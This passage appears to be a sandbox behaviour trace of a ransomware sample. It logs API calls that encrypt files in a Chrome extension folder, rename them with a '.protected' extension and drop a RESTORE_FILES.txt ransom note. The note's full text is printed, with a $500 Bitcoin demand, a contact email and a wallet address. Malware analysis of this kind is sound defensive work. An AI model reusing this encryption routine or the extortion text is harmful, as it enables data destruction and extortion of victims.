lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.576] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.579] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.579] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.580] CloseHandle (hObject=0x168) returned 1 [0083.580] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.protected") returned 174 [0083.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.protected")) returned 1 [0083.581] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0 [0083.581] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.581] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\RESTORE_FILES.txt") returned 168 [0083.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.581] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.581] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.582] lstrlenA (lpString="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") returned 684 [0083.582] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.582] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.582] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.583] CloseHandle (hObject=0x164) returned 1 [0083.583] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="Windows") returned -1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="Program Files") returned -1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="Program Files (x86)") returned -1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="$Recycle.bin") returned 1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="System Volume Information") returned -1 [0083.583] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu") returned 150 [0083.583] lstrcmpW (lpString1="gu", lpString2=".") returned 1 [0083.583] lstrcmpW (lpString1="gu", lpString2="..") returned 1 [0083.583] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\*") returned 152 [0083.583] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.583] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.585] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.585] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.585] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.585] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.585] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\.") returned 152 [0083.585] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.585] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.585] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.585] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.585] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.585] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.585] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.586] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\..") returned 153 [0083.586] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.586] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.586] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.586] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json") returned 164 [0083.586] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.586] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.586] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.586] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json") returned 164 [0083.597] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json") returned 164 [0083.597] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json") 
returned 164 [0083.597] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.597] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.599] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.599] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.599] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.599] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.600] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.600] CloseHandle (hObject=0x168) returned 1 [0083.600] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.protected") returned 174 [0083.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.protected")) returned 1 [0083.600] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.601] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.601] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\RESTORE_FILES.txt") returned 168 [0083.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.601] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.601] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.602] lstrlenA (lpString="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") returned 684 [0083.602] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0083.602] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.602] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.602] CloseHandle (hObject=0x164) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0083.602] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0083.602] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi") returned 150 [0083.602] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0083.602] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0083.602] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\*") returned 152 [0083.602] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0083.603] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.603] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.603] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.603] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.603] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.603] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\.") returned 152 [0083.603] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.603] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.603] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.603] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.603] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.603] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.603] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.603] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\..") returned 153 [0083.603] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.603] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.603] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.603] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.603] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.603] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0083.603] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.603] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.603] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json") returned 164 [0083.603] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.603] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.603] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.603] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.604] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json") returned 164 [0083.604] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.604] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json") returned 164 [0083.604] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.604] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json") returned 164 [0083.604] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.604] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.605] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.605] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.605] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.607] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.607] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.607] CloseHandle (hObject=0x168) returned 1 [0083.607] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.protected") returned 174 [0083.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.protected")) returned 1 [0083.608] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.608] FindClose (in: 